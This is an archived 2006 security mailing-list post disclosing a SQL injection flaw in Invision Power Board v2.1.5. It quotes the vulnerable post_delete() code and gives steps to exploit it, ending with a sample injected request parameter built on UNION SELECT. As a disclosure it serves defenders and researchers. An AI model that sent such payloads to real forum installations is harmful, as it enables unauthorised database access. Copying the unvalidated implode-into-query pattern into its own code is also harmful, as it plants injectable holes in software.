Invision Power Board v2.1.5 Remote SQL Injection Apr 28 2006 08:21AM
o y 6 hotmail com
Invision Power Board v2.1.5 Remote SQL Injection

Filename :- func_mod.php

Functionname :- post_delete()

Lines :- 89 To 209

Bug Found By :- Devil-00

Greetz :-

Rock Master ^ Hackers Pal ^ n0m4rcy ^

www.securtygurus.net

[Code]

if ( is_array( $id ) )

{

if ( count($id) > 0 )

{

$pid = " IN(".implode(",",$id).")";

}

else

{

return FALSE;

}

}

else

{

if ( intval($id) )

{

$pid = "=$id";

}

else

{

return FALSE;

}

}

[/CODE]

When $id = array .. the code don't check it if ( INTVAL )

[CODE]

if ( count($id) > 0 )

{

$pid = " IN(".implode(",",$id).")";

}

[/CODE]

Then We Can Do SQL Injection Here >>

[CODE]

$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );

[/CODE]

And Here >>

[CODE]

$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );

[/CODE]

Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(

Exm. To Exploit

1- First Add 2 Post

2- Check It To Delete

3- Edit String Query By HTTPLiveHeader

[CODE]

act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete

[/CODE]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus